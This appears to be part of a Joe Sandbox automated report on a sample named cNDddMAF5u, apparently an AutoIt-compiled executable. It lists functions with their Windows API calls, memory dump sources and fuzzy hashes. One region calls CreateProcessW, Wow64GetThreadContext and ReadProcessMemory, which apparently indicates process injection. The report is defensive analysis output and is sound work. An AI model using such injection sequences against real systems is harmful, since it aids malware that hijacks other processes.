Instruction Fuzzy Hash: A4719BB49112408EC788EF7DA8566553AE5AB8A3D47D5C22E900EDB261EB3C48A0CF5D

Function 0070C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 006A3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0070C259
KillTimer.USER32(?,00000001,?,?), ref: 0070C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0070C270

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: e9eb8f32b7cb484c7677ec1e247cb3cd95f81b912c866de1702ce6a510a897ab
Instruction ID: 0f544f9c7541cf212c79fe0841060137fa858a9cfc5c12b6c26a5fb1e6f0db6e
Opcode Fuzzy Hash: e9eb8f32b7cb484c7677ec1e247cb3cd95f81b912c866de1702ce6a510a897ab
Instruction Fuzzy Hash: 0031C570904344AFEB239F648855BEBBBECAF06308F00459DE6DEA3281C7785A84CB55

Function 006D86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,006D85CC,?,00768CC8,0000000C), ref: 006D8704
GetLastError.KERNEL32(?,006D85CC,?,00768CC8,0000000C), ref: 006D870E
__dosmaperr.LIBCMT ref: 006D8739

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: fc00fb261cb1937d8b8ea235d65455c3d8451f664250e25a08165bc29a5d8bb6
Instruction ID: 9fb5be4e376d257a5452d5b180af9014eb94e4a302a2f5a8be2c0903bcf72448
Opcode Fuzzy Hash: fc00fb261cb1937d8b8ea235d65455c3d8451f664250e25a08165bc29a5d8bb6
Instruction Fuzzy Hash: 58018232E041B02ED6656734584DBBE2B478B81774F36011FF8059B3D3DE64CC818294

Function 006ADB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 006ADB7B
DispatchMessageW.USER32(?), ref: 006ADB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006ADB9F
Sleep.KERNEL32(0000000A), ref: 006ADBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 006F1CC9

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 7dfdfbd04b42248ac383d45ead6892dc1b844c438e9a4dafa60d61d3faeb9399
Instruction ID: 6e77503be2e22aeabdbcad1e91388eb894e52b431e2f6c42a1d0c8b2263744d3
Opcode Fuzzy Hash: 7dfdfbd04b42248ac383d45ead6892dc1b844c438e9a4dafa60d61d3faeb9399
Instruction Fuzzy Hash: 97F05E706043449BEB30DB608C49FEA73AAEF46351F508518E65A971C0DB3894888F2A

Function 00712FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00712CD4,?,?,?,00000004,00000001), ref: 00712FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00712CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00713006
CloseHandle.KERNEL32(00000000,?,00712CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0071300D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 1c432edd710b0f2d9d9bcafd3ec7cd57efe1b85ce371d8f5b97075b912be2b90
Instruction ID: 9b5f7a083b9bd50672060e66d40e5abff8ea175c1203df0863d36d5a9a82061e
Opcode Fuzzy Hash: 1c432edd710b0f2d9d9bcafd3ec7cd57efe1b85ce371d8f5b97075b912be2b90
Instruction Fuzzy Hash: 98E0863228121477E2311759BC0DFCB3A5CD78AB72F118210F719750D046A4550153AC

Function 006B1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006B17F6

Strings

CALL, xrefs: 006B17C6

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: bfdbe135aa32a7a759521c6e71e765d40a9655bfcc68371ed32674e5d054b4ef
Instruction ID: b4f7e80ea84b8635843233bf0c195c7d7590c476f1b666ef219c0f04b5ff9fbc
Opcode Fuzzy Hash: bfdbe135aa32a7a759521c6e71e765d40a9655bfcc68371ed32674e5d054b4ef
Instruction Fuzzy Hash: F922AEB1608201EFC714DF14C490AAABBF2BF86314F64896DF5968B362D735ED81CB52

Function 00716EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00716F6B

Part of subcall function 006A4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00716F5A, 00716F63

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 8d0f6fef67eec3979579644e29b86011430d3fd57556d8f28d1534b107235084
Instruction ID: df10714a5263a0d97a7ff6e92172deccebbd721d21b917707167b6ebe76f1566
Opcode Fuzzy Hash: 8d0f6fef67eec3979579644e29b86011430d3fd57556d8f28d1534b107235084
Instruction Fuzzy Hash: 5FB17D315082018FCB58FF24C8919AEB7F6AF95310F14891DF496972A2DB34ED89CF96

Function 016D4155 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016D4913
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016D49A9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016D49CB

Memory Dump Source

Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
Instruction ID: 9448af8d2a2e52027d549c413495d7c2775d4a67b0317817382beae2addb5277
Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
Instruction Fuzzy Hash: 2B12CE24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A

Function 006BFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 006BFD1F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 881030a601d1f81703dc9e1b141fec1c16d64a60e14f8616c552a6de90acb2e7
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 2131C6B5A00109DBD718DF59D880AA9FBA6FF49300B6486A5E809CF766D731EDC1CBD0

Function 006A4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E9C
Part of subcall function 006A4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006A4EAE
Part of subcall function 006A4E90: FreeLibrary.KERNEL32(00000000,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EFD

Part of subcall function 006A4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E62
Part of subcall function 006A4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006A4E74
Part of subcall function 006A4E59: FreeLibrary.KERNEL32(00000000,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E87

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: ac52bd9c6b26dd56824d97695395d9b7cb6771759f346cd983239c92d456e6f6
Instruction ID: 770126a5aca4ad0f28f0243ca1181502ea7425c814dbfeee7e9169ae5294cbd6
Opcode Fuzzy Hash: ac52bd9c6b26dd56824d97695395d9b7cb6771759f346cd983239c92d456e6f6
Instruction Fuzzy Hash: E1110432600305AADB10FB60DC06FADB7A6AFC1B10F20842DF452A61C2DEB5AE059B59

Function 006D8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 006D8440

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 7cef15def9c8cb45dfc325f41eb7adcbf1b365d5c43efedf99b20af142fe8a22
Instruction ID: ec573ec7964a4d28643ae53bb98ae23aadb3ca21970d7c3cb992a55f731d61af
Opcode Fuzzy Hash: 7cef15def9c8cb45dfc325f41eb7adcbf1b365d5c43efedf99b20af142fe8a22
Instruction Fuzzy Hash: B111187590420AAFCB15DF58E945ADA7BF5EF48314F10405AF808AB312DB31EA11CBA5

Function 006CE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 1d0d6e5e8bf338cdf70b00f315255dad2e9e58213d69855a4b61723bab1175b8
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 9DF0D632921A109AC6312A768C05FBA33AFDF62331F10072EF421933D2DA75980286A9

Function 006D3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e68f40b971dde04fc92a82441575004f69d55a666c8ec0364dee2609043c6258
Instruction ID: ec27d3495b65ffcf2232f122da6d9cad17e136ed14cc602f2deaf159d3f6862c
Opcode Fuzzy Hash: e68f40b971dde04fc92a82441575004f69d55a666c8ec0364dee2609043c6258
Instruction Fuzzy Hash: E5E0E53190023456E62166669C01FEA374BEF427B0F09002ABC1596780CB50DE01A3E6

Function 006A4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4F6D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9ce5c5fbf15134f03e04ad132a0e1e9d44e33cd96a1240c3c42001ea6937b4c4
Instruction ID: 23785070fd4eb80991404af2bf6d8b2052d3a0d4fc7655819fd86023c5acd475
Opcode Fuzzy Hash: 9ce5c5fbf15134f03e04ad132a0e1e9d44e33cd96a1240c3c42001ea6937b4c4
Instruction Fuzzy Hash: 24F0A071005341CFDB34AF20D890862B7F2EF81319320D97EE1DA82610CBB19C44DF00

Function 006A2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A2DC4

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 56aaf19ecebb32f8751130aa43690b07b1018b7157e035fef66fed60bb077aeb
Instruction ID: 67de308d84036b99c53d773c00f1a3774f1846835a166cec7bfd160ebc1258c0
Opcode Fuzzy Hash: 56aaf19ecebb32f8751130aa43690b07b1018b7157e035fef66fed60bb077aeb
Instruction Fuzzy Hash: D0E0CD726002245BD711A258DC05FDA77DDDFC9790F044075FD09E7248D974AD808695

Function 006A2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006A3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006A3908

Part of subcall function 006AD730: GetInputState.USER32 ref: 006AD807

SetCurrentDirectoryW.KERNEL32(?), ref: 006A2B6B

Part of subcall function 006A30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 006A314E

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 1264cf64257bac242921c78a0fe6f1de230ae4ad7b929b652f53017b64c114e1
Instruction ID: 07d43bf1e85195aee31e7afdf4676796eaef88355f9e45519552f3848f1a9344
Opcode Fuzzy Hash: 1264cf64257bac242921c78a0fe6f1de230ae4ad7b929b652f53017b64c114e1
Instruction Fuzzy Hash: DBE0863230425407CA48BB78A8565BDA75B9FD3395F40553EF14753262CE288D454B6A

Function 006E039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,006E0704,?,?,00000000,?,006E0704,00000000,0000000C), ref: 006E03B7

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d0ee2859e23a648ec96d3df0f0b8163c23c0faa604f6abd171b2ab022f9346db
Instruction ID: 2771f3e321c2b8561938b030d69f9973a38b4610a9d1e01f1153fe57bd52778b
Opcode Fuzzy Hash: d0ee2859e23a648ec96d3df0f0b8163c23c0faa604f6abd171b2ab022f9346db
Instruction Fuzzy Hash: 42D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1866020C736E821AB94

Function 006A1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 006A1CBC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 72c37776629c2f39b25da377afcb68094ce82c6a0db19cb7bdda5f9a17a49553
Instruction ID: 01da4a31d88516dff99daa7aa6a8cbe96f4b3a395e759738e21b42d05a4076f8
Opcode Fuzzy Hash: 72c37776629c2f39b25da377afcb68094ce82c6a0db19cb7bdda5f9a17a49553
Instruction Fuzzy Hash: C1C09B36380304DFF2154794BC5AF107754A348B41F54C001F64D655E3C3A51470D758

Function 016D5158 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 016D5169

Memory Dump Source

Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: cf1e2db0d02cf6439eb29dffe50dcdb0870e7e4d909ac993a822fdd050e59f2c
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 6CE0E67494010DEFDB00DFB4D94969D7FB4EF04302F100261FD01D2280DA709D508A62

Non-executed Functions

Function 00739576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0073961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0073965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0073969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007396C9
SendMessageW.USER32 ref: 007396F2
GetKeyState.USER32(00000011), ref: 0073978B
GetKeyState.USER32(00000009), ref: 00739798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007397AE
GetKeyState.USER32(00000010), ref: 007397B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007397E9
SendMessageW.USER32 ref: 00739810
SendMessageW.USER32(?,00001030,?,00737E95), ref: 00739918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0073992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00739941
SetCapture.USER32(?), ref: 0073994A
ClientToScreen.USER32(?,?), ref: 007399AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007399BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007399D6
ReleaseCapture.USER32 ref: 007399E1
GetCursorPos.USER32(?), ref: 00739A19
ScreenToClient.USER32(?,?), ref: 00739A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00739A80
SendMessageW.USER32 ref: 00739AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00739AEB
